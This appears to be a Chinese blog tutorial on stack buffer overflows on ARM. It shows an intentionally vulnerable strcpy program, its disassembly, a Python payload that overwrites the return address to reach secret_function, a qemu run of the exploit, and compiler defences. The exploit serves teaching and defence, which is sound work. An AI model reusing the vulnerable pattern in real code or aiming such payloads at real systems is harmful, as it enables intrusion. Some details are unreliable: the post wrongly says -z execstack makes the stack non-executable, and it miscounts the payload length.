堆栈溢出漏洞:原理、利用与防范

于 2024-08-18 22:28:04 发布
阅读量1.2k 收藏 31
点赞数 7
文章标签: 安全 汇编 嵌入式硬件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42130310/article/details/141305914
版权

目录

1.什么是堆栈溢出漏洞?

2.漏洞原理

3.漏洞利用

4.防范堆栈溢出漏洞的方法

1). 使用安全的字符串处理函数

2). 增加安全机制

3). 使用 checksec 查看安全机制

5.总结

1.什么是堆栈溢出漏洞?

堆栈溢出漏洞是一种常见的安全漏洞,通常发生在程序使用不安全的字符串处理函数时。当程序尝试将超过预定大小的数据写入栈上分配的内存区域时,就会导致堆栈溢出。这种漏洞可能被攻击者利用,以覆盖返回地址或其他重要数据,从而控制程序的执行流。

2.漏洞原理

让我们通过一个简单的 C 语言示例来说明堆栈溢出漏洞的原理。

#include <stdio.h>
#include <string.h>

void secret_function() {
    printf("You've been hacked!\n");
}

void vulnerable_function(char *input) {
    char buffer[10]; // 定义一个大小为 10 的字符数组
    strcpy(buffer, input); // 不安全的字符串复制
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input_string>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]); // 调用易受攻击的函数
    return 0;
}

将上述代码保存为,vulnerable.c。在这个示例中,vulnerable_function 使用 strcpy 将输入字符串复制到 buffer 中。由于 strcpy 不检查目标缓冲区的大小,如果输入字符串的长度超过 10 个字符,就会导致堆栈溢出。

采用交叉编译器将上述代码进行编译,采用如下命令。

arm-linux-gnueabi-gcc -o vulnerable_program vulnerable.c -fno-stack-protector

截取其中vulnerable_function的汇编代码如下:

.text:0001047C 00 48 2D E9                   PUSH    {R11,LR}
.text:00010480 04 B0 8D E2                   ADD     R11, SP, #4
.text:00010484 18 D0 4D E2                   SUB     SP, SP, #0x18
.text:00010488 18 00 0B E5                   STR     R0, [R11,#src]
.text:0001048C 10 30 4B E2                   SUB     R3, R11, #-dest
.text:00010490 18 10 1B E5                   LDR     R1, [R11,#src]                  ; src
.text:00010494 03 00 A0 E1                   MOV     R0, R3                          ; dest
.text:00010498 A5 FF FF EB                   BL      strcpy
.text:0001049C 00 00 A0 E1                   NOP
.text:000104A0 04 D0 4B E2                   SUB     SP, R11, #4
.text:000104A4 00 88 BD E8                   POP     {R11,PC}
堆栈变化过程

当输入字符串的长度超过 10 字节时,strcpy 将继续写入 buffer 之后的内存区域,可能会覆盖返回地址或其他重要数据。以下是堆栈的变化过程:

函数调用时的堆栈状态

|------------------| <- sp (栈指针)
| 返回地址          | <- 之前的返回地址(main 函数的地址)
|------------------|
| r11 保存的值       | <- 保存的 r11
|------------------|
| buffer[10]       | <- buffer 的空间(10 字节)
|------------------| <- sp - 18 (分配的堆栈空间)
  • 返回地址:保存调用 vulnerable_function 的函数的返回地址。
  • r11 保存的值:保存 r11 的值,以便在函数返回时恢复。
  • buffer:为 buffer 分配了 10 字节的空间。
 调用 strcpy

当执行到 strcpy(buffer, input) 时,如果输入字符串的长度超过 10 字节,堆栈的变化过程如下:

假设输入字符串为 "AAAAAAAAAAAAAA"(16 字节),堆栈状态在调用 strcpy 时会变为:

|------------------| <- sp (栈指针)
| 被覆盖的地址      | <- 被覆盖的返回地址(可能是攻击者指定的地址)
|------------------|
| r11 保存的值      | <- 保存的 r11,被覆盖
|------------------|
| AAAAAAAAAAAAAA   | <- buffer[0-9]
|------------------| <- sp - 18 (分配的堆栈空间)

在这个情况下,返回地址被覆盖为攻击者构造的地址(例如,指向 secret_function 的地址)。因此,当函数返回时,程序将跳转到攻击者指定的位置,而不是返回到原来的调用者。

3.漏洞利用

攻击者可以构造一个特定的输入字符串,使其长度超过目标缓冲区的大小,从而覆盖返回地址并使程序跳转到攻击者控制的代码。例如,攻击者可以使用以下 Python 脚本构造攻击载荷:

import sys

# 构造输入字符串
buffer_size = 10
return_address = b'\x60\x04\x01\x00'  # secret_function 的地址(0x00010460)

# 构造输入字符串
payload = b'A' * (buffer_size+2 +4) + return_address  # 保证4字节对齐,再覆盖保存r11的内存地址,最后覆盖保存lr的内存地址

# 输出字节
sys.stdout.buffer.write(payload)

将上述代码保存为exp.py,secret_function的程序地址可以通过静态分析工具获取,例如IDA。

运行:

python3 exp.py >payload.bin

可生成负载paylod.bin

采用qumu-arm模拟器验证负载是否触发漏洞执行,执行如下代码:

qemu-arm -L /usr/arm-linux-gnueabi ./vulnerable_program `<payload.bin`

打印结果如下:

./vulnerable_program `<payload.bin`
bash: 警告: 命令替换:忽略输入中的 null 字节
You've been hacked!
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
段错误 (核心已转储)

说明执行了secret_function函数。

4.防范堆栈溢出漏洞的方法

为了防止堆栈溢出漏洞,可以采取以下几种措施:

1). 使用安全的字符串处理函数

使用安全的字符串处理函数,如 strncpysnprintf,可以防止缓冲区溢出。例如,使用 strncpy 时可以指定最大复制长度:

strncpy(buffer, input, sizeof(buffer) - 1);
buffer[sizeof(buffer) - 1] = '\0'; // 确保字符串以 NULL 结尾

2). 增加安全机制

在编译过程中,可以启用多种安全机制来增强程序的防护能力:

  • 堆栈保护:使用 -fstack-protector 编译选项,可以在函数中插入金丝雀值,以检测堆栈溢出。当前的新版本gcc已经默认开启了堆栈保护功能。

        增加该机制后,重新编译上述程序的汇编代码如下:

.text:00010518 00 48 2D E9                   PUSH    {R11,LR}
.text:0001051C 04 B0 8D E2                   ADD     R11, SP, #4
.text:00010520 18 D0 4D E2                   SUB     SP, SP, #0x18
.text:00010524 18 00 0B E5                   STR     R0, [R11,#src]

;下面这段代码加载堆栈金丝雀值(stack canary)并将其存储在栈帧中的某个位置。这是堆栈保护机制的关键部分。
---------------------------------------------------------------------------------------
.text:00010528 40 30 9F E5                   LDR     R3, =off_1065C
.text:0001052C 00 30 93 E5                   LDR     R3, [R3]                        ; __stack_chk_guard__GLIBC_2.4
.text:00010530 08 30 0B E5                   STR     R3, [R11,#var_8]
----------------------------------------------------------------------------------------


.text:00010534 00 30 A0 E3                   MOV     R3, #0
.text:00010538 14 30 4B E2                   SUB     R3, R11, #-dest
.text:0001053C 18 10 1B E5                   LDR     R1, [R11,#src]                  ; src
.text:00010540 03 00 A0 E1                   MOV     R0, R3                          ; dest
.text:00010544 A1 FF FF EB                   BL      strcpy
.text:00010544
.text:00010548 00 00 A0 E1                   NOP

;下面这一段代码检查堆栈金丝雀值是否被篡改。如果金丝雀值被修改(即发生了堆栈溢出),程序将调用 __stack_chk_fail 函数,通常会导致程序崩溃并输出错误信息。
----------------------------------------------------------------------------------------
.text:0001054C 1C 30 9F E5                   LDR     R3, =off_1065C
.text:00010550 00 20 93 E5                   LDR     R2, [R3]                        ; __stack_chk_guard__GLIBC_2.4
.text:00010554 08 30 1B E5                   LDR     R3, [R11,#var_8]
.text:00010558 02 20 33 E0                   EORS    R2, R3, R2
.text:0001055C 00 30 A0 E3                   MOV     R3, #0
.text:00010560 00 00 00 0A                   BEQ     loc_10568
.text:00010560
.text:00010564 96 FF FF EB                   BL      __stack_chk_fail
----------------------------------------------------------------------------------------



.text:00010564
.text:00010568                               ; ---------------------------------------------------------------------------
.text:00010568
.text:00010568                               loc_10568                               ; CODE XREF: vulnerable_function+48↑j
.text:00010568 04 D0 4B E2                   SUB     SP, R11, #4
.text:0001056C 00 88 BD E8                   POP     {R11,PC}

这部分原理介绍在我之前的文章最简单的STM32库函数HAL_GPIO_ReadPin的汇编代码分析_stm32gpio汇编-CSDN也有提及,感兴趣的读者可以访问一下。

  • 不可执行堆栈:gcc编译时使用 -z execstack 选项可以将堆栈标记为不可执行,防止在堆栈上运行恶意代码。工作原理: 不可执行堆栈(NX)标记防止在堆栈上执行代码。即使攻击者成功将恶意代码写入堆栈,试图通过堆栈溢出来执行该代码也会失败,因为堆栈被标记为不可执行。

  • 地址空间布局随机化(ASLR):虽然 ASLR 通常在操作系统级别启用,但确保它被启用可以增加攻击的难度。工作原理: ASLR 随机化程序、库、堆和栈的内存地址,使得攻击者难以预测目标地址。即使攻击者能够利用堆栈溢出漏洞,随机化的地址会使得攻击变得复杂和困难。

  • 位置无关执行(PIE):使用 -fPIE-pie 选项生成位置无关的可执行文件。工作原理:位置无关执行(PIE)使得可执行文件在运行时随机化其加载地址。攻击者无法预测代码的确切位置,从而降低了利用漏洞的成功率。

  • 完整性保护(RELRO):使用 -Wl,-z,relro-Wl,-z,now 选项来启用全局变量和函数指针的完整性保护。工作原理: 完整性保护(RELRO)防止在程序运行时修改全局变量和函数指针。通过将数据段标记为只读,攻击者无法通过修改全局变量来实现控制,从而提高了程序的安全性。

3). 使用 checksec 查看安全机制

checksec 是一个用于检查可执行文件安全特性的工具。可以使用它来查看编译的程序是否启用了上述安全机制。

checksec --fortify-file ./vulnerable_program

5.总结

堆栈溢出漏洞是一种严重的安全风险,攻击者可以利用它来控制程序的执行流。通过使用安全的字符串处理函数和启用多种安全机制,可以有效地防止此类漏洞的发生。定期使用工具如 checksec 来检查程序的安全特性,将有助于提高系统的整体安全

无聊代码剖析师
关注
CyberAsk:网络查询的堆栈溢出
03-26
在网络安全领域,堆栈溢出...这个项目可能涵盖了堆栈溢出漏洞的分析、安全编码实践、以及相关的防御技术。通过深入学习和理解这个项目,开发者可以提高自己在网络应用开发中的安全性,防止因堆栈溢出而引发的安全风险。
堆溢出漏洞简介
这里没人
05-14 8421
简介 这次来介绍一下堆溢出漏洞。不过这次的堆溢出漏洞比较复杂,不像栈溢出一样容易理解。所以这一次的内容会比较多。我尽量详细的介绍堆溢出漏洞,以及相关的知识。 首先,关于神马是堆溢出。简而言之就是在堆上产生的溢出。一般我们使用malloc等函数申请的内存都会储存在堆段上。并且由操作系统来管理已经使用和剩余内存,完成内存分配以及回收等等的操作。而堆溢出便是因为程序员的粗心大意,造成了读入的数据超过...
栈溢出漏洞攻击原理及防护技术
wei.zhou的专栏
08-12 8184
文/H3C攻防研究团队 现阶段的安全漏洞种类很多,包括大家熟悉的SQL注入漏洞、缓存溢出漏洞、XSS跨站脚本漏洞等。而栈溢出漏洞作为缓冲区溢出漏洞的一种特定的表现形式,在现实网络环境中比较普遍。本文将从栈溢出漏洞原理、攻击形式及防护方法等方面进行介绍 一、 栈溢出漏洞原理 栈溢出(Stack Overflow)是在网络与分布式系统中被广泛利用的一种漏洞类型。在汇编中,以线程为线索的指令执
PWN入门学习之简单的栈溢出
最新发布
2301_80718478的博客
06-28 778
栈溢出是PWN的一种最简单的漏洞,其最核心的点就是,程序在读取用户输入的时候没有对输入内容进行检测与限制,从而导致输入的数据写入内存时挤占了其它不属于该变量的内存位置,从而导致重要寄存器(如RBP、RIP)中记录的地址被破坏,导致函数执行完返回时发生错误(找不到这样一个地址),即发生段错误(Segment fault)。但是同时,我们可以利用改写RBP、RIP寄存器值的这一特性,将程序跳转至我们期望的地方去。
黑客攻防入门(一)缓冲区(堆栈)溢出
不断攀登
07-26 8499
1. 概说缓冲区溢出又叫堆栈溢出(还有许许多的称呼),这是计算机程序难以避免的漏洞,除非有新的设计方式将程序运行的堆栈设计取代。溢出的目的是重写程序的运行堆栈,使调用返回堆栈包含一个跳向预设好的程序的程序(代码),这个程序通常称为shellcode,通过这个shellcode就能获得如期的shell,更有可能获得root。2. 缓冲区溢出的原理计算机中每一个运行中的程序都有相同的内存布局(逻辑布局)
栈溢出漏洞
AlexYoung28的博客
10-22 2276
1.基础知识 函数与函数栈 栈是一种先进后出的特殊数据结构,用于存储 程序在运行时的临时数据和地址,用于支撑函 数的运行和嵌套调用。 栈的分配是由程序编译时确定下来的,无法由 程序员控制。 栈中存储着线程或者进程的局部变量 不同的进程或线程的栈处于不同的位置,在程 序正常运行时不同线程和进程之间不能互相访 问彼此的栈地址 函数传递参数: 函数都要通过传递进去的参数来确...
堆栈溢出(Stack Overflow)的解决方法
热门推荐
PlayBoy's 部落格
01-20 3万+
堆栈溢出是程序调试中,比较麻烦的一种错误,但不外乎就是递归和变量申请大空间内存;错误时,弹出如下图所示框框:其中,0x7c934ffd的值依具体情况而不同。OxC00000FD是错误标号; 1. 局部数组变量空间太大,如下: int main(int argc, char* argv[]){    char stack_overflow[1024*1024*5];   
堆栈溢出
damenhanter的专栏
11-21 1万+
Q:什么是堆栈溢出堆栈溢出是什么意思? 堆栈是一种计算机内存的管理方式,在计算机领域,堆栈是一个不容忽视的概念,但是很多人甚至是计算机专业的人也没有明确堆栈其实是两种数据结构。堆栈都是一种数据项按序排列的数据结构,只能在一端(称为栈顶(top))对数据项进行插入和删除。要点:堆:顺序随意栈:后进先出(Last-In/First-Out) 。 从物理上讲,堆栈是就是一段连续分配的内存空间。
数据结构——堆栈的C++实现
zxr916的博客
11-02 606
数据结构——堆栈的C++实现 \qquad堆栈的创建、判断是否为空,入栈,出栈操作的C++实现。 #include<iostream> using namespace std; //1.定义 typedef struct Node* Link; struct Node { int num; Link next; }; //2.创建堆栈头结点 Link CreateStack() { Link s; s = new Node; s->next = NULL; return s
windows下的堆栈溢出利用技术.
01-15
本文将深入探讨Windows平台下的堆栈溢出利用技术,帮助读者理解这种漏洞的工作原理、检测方法以及防范措施。 一、堆栈溢出原理 堆栈是CPU在执行程序时存储局部变量、函数参数、返回地址等临时信息的地方。当程序向...
缓冲区溢出漏洞分析及防范策略.pdf
09-10
《缓冲区溢出漏洞分析及防范策略》 缓冲区溢出漏洞是计算机系统安全领域中的一个常见问题,它源于程序处理数据时对内存空间管理不当,导致数据超出预分配的缓冲区边界,进而可能破坏相邻的数据区域,甚至控制程序...
导致堆栈溢出的原因什么?
NancyFyn的博客
02-23 1万+
导致堆栈溢出的原因: 1. 函数调用层次太深。函数递归调用时,系统要在栈中不断保存函数调用时的现场和产生的变量,如果递归调用太深,就会造成栈溢出,这时递归无法返回。再有,当函数调用层次过深时也可能导致栈无法容纳这些调用的返回地址而造成栈溢出。 2. 动态申请空间使用之后没有释放。由于C语言中没有垃圾资源自动回收机制,因此,需要程序主动释放已经不再使用的动态地址空间。申请的动态空间使用的是堆空间,动态空间使用不会造成堆溢出。 3. 数组访问越界。C语言没有提供数组下标越界检查,如
C语言再学习 -- Stack Overflow(堆栈溢出
不积跬步,无以至千里
10-17 1万+
参看:Stack Overflow(堆栈溢出) Visual Studio执行出现Stack Overflow,该怎么处理呢? 一、产生原因 Stack Overflow(堆栈溢出)是程序调试中比较麻烦的一种错误。但总结一下,引起这种错误的原因大致就是两种: 变量申请大空间内存。 递归。 二、解决方法 原因一: 局部数组变量空间太大 解决这类问题的办法有两个,一是增大栈空间(后文中有详细描述),二是改用动态分配,使用堆(heap)而不是栈(stack)。 解决方法 1 增大栈空间 修改 属性->
栈溢出漏洞栈溢出攻击
guilanl的专栏
03-13 1万+
1. 栈溢出的原因 栈溢出(stack-based buffer overflows)算是安全界常见的漏洞。一方面因为程序员的疏忽,使用了 strcpy、sprintf 等不安全的函数,增加了栈溢出漏洞的可能。另一方面,因为栈上保存了函数的返回地址等信息,因此如果攻击者能任意覆盖栈上的数据,通常情况下就意味着他能修改程序的执行流程,从而造成更大的破坏。这种攻击方法就是栈溢出攻击(stack
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值